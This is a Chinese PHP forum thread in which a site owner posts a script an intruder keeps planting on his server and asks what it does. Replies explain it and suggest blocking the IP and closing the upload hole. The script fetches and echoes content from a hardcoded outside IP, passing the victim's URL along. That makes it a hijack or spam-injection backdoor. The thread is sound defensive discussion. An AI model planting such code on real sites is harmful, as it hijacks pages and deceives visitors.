PHP代码 请高手帮忙看下什么意思

雨123123 2016-04-29 04:43:14
我网站好像被黑了,总有个SB天天来我网站根目录放一个文件,打开后代码如下:
<?php
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
$Remote_server = "http://122.114.126.160/";
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name);
echo $Content_mb;
exit();
function getHTTPPage($url) {
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context);
if (empty($html)) {
exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>");
}
return $html;
}
?>

这什么意图?求高手分析下
...全文
240 16 打赏 收藏 转发到动态 举报
写回复
用AI写文章
16 条回复
切换为时间正序
请发表友善的回复…
发表回复
雨123123 2016-05-06
  • 打赏
  • 举报
回复
引用 15 楼 cwk44 的回复:
我猜测他是想放到你public_html文件夹下seo.php,如果有文件就是替换掉里面的文件 结果/打错了,变成还在外面的文件夹
谢谢 有可能
cwk44 2016-04-30
  • 打赏
  • 举报
回复
我猜测他是想放到你public_html文件夹下seo.php,如果有文件就是替换掉里面的文件 结果/打错了,变成还在外面的文件夹
雨123123 2016-04-29
  • 打赏
  • 举报
回复
引用 10 楼 misakaqunianxiatian 的回复:
不管怎么样,先把对方的IP给禁掉吧,配置你的服务器:禁止122.114.126.160的IP访问你的网站。
------------------------- 感谢
雨123123 2016-04-29
  • 打赏
  • 举报
回复
引用 11 楼 fdipzone 的回复:
把你页面的内容替换了。 先看看程序那里有漏洞让人上传文件比较好,漏洞不封以后还是很多问题的。
------------------------- 感谢
雨123123 2016-04-29
  • 打赏
  • 举报
回复
引用 9 楼 xuzuning 的回复:
没有异常? set_time_limit(0); //永不超时 header("Content-Type: text/html;charset=gb2312"); //指定浏览器字符集 $Remote_server = "http://122.114.126.160/"; //远程网站 $host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; //构造当前页的 url $userAgent = $_SERVER['HTTP_USER_AGENT']; //获取浏览者的浏览器信息 $Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name); //调用远程网站 echo $Content_mb; //输出远程网站返回内容 exit(); //退出程序运行 function getHTTPPage($url) { //调用远程网站函数 $opts = array( 'http'=>array( 'method'=>"GET", 'header'=>"User-Agent: aQ0O010O" ) ); $context = stream_context_create($opts); $html = @file_get_contents($url, false, $context); //访问远程网站,你的url也传过去了 if (empty($html)) { exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>"); } return $html; } 至于对方做了什么?目前尚不清楚 如果是在本地开发环境,返回的是广告,正常的页面没有了 如果是运行中的网站,那么若没异样的话,就说明潜在的威胁是很大的(CSRF攻击) 仅是出一点广告,倒是也无所谓
------------------------- 感谢
傲雪星枫 2016-04-29
  • 打赏
  • 举报
回复
把你页面的内容替换了。 先看看程序那里有漏洞让人上传文件比较好,漏洞不封以后还是很多问题的。
misaka去年夏天 2016-04-29
  • 打赏
  • 举报
回复
不管怎么样,先把对方的IP给禁掉吧,配置你的服务器:禁止122.114.126.160的IP访问你的网站。
xuzuning 2016-04-29
  • 打赏
  • 举报
回复
没有异常? set_time_limit(0); //永不超时 header("Content-Type: text/html;charset=gb2312"); //指定浏览器字符集 $Remote_server = "http://122.114.126.160/"; //远程网站 $host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; //构造当前页的 url $userAgent = $_SERVER['HTTP_USER_AGENT']; //获取浏览者的浏览器信息 $Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name); //调用远程网站 echo $Content_mb; //输出远程网站返回内容 exit(); //退出程序运行 function getHTTPPage($url) { //调用远程网站函数 $opts = array( 'http'=>array( 'method'=>"GET", 'header'=>"User-Agent: aQ0O010O" ) ); $context = stream_context_create($opts); $html = @file_get_contents($url, false, $context); //访问远程网站,你的url也传过去了 if (empty($html)) { exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>"); } return $html; } 至于对方做了什么?目前尚不清楚 如果是在本地开发环境,返回的是广告,正常的页面没有了 如果是运行中的网站,那么若没异样的话,就说明潜在的威胁是很大的(CSRF攻击) 仅是出一点广告,倒是也无所谓
雨123123 2016-04-29
  • 打赏
  • 举报
回复
引用 7 楼 u013358222 的回复:
服务器 那方面的我不懂,等高手来把,
谢谢你
雨123123 2016-04-29
  • 打赏
  • 举报
回复
上面我的描述有问题,这个文件不是放在更目录,是放在根目录的上一个目录,如图:

public_html 这个目录里面是网站的根目录,他这个文件和public_html放在同一个目录,不知道他这样对我的网站有什么影响。 这SB隔天来次,已经删了几次了。
linux系统,目前权限设置为755,设置为644网站就打不开了,有什么办法不让他上次文件吗?
山水天元 2016-04-29
  • 打赏
  • 举报
回复
$Remote_server."/index.html?host=".$host_name 这个地方他把你的网站地址传过去 不知道干什么了 ,代码在那个ip的服务器上面 看不到。。。。。猜不来他要干什么。。。。。
雨123123 2016-04-29
  • 打赏
  • 举报
回复
我网站没异常(我还没发现异常)
雨123123 2016-04-29
  • 打赏
  • 举报
回复
引用 2 楼 u013358222 的回复:
好像是他把你网站 原始地址 传到他自己写的一个方法里面 用 host 参数接受 然后抓取你首页的信息吧
我网站没异常(我还没发现异常)
山水天元 2016-04-29
  • 打赏
  • 举报
回复
好像是他把你网站 原始地址 传到他自己写的一个方法里面 用 host 参数接受 然后抓取你首页的信息吧
山水天元 2016-04-29
  • 打赏
  • 举报
回复
他把这个代码放到你根目录下,网站是不是访问不了?

21,887

社区成员

发帖
与我相关
我的任务
社区描述
从PHP安装配置,PHP入门,PHP基础到PHP应用
社区管理员
  • 基础编程社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧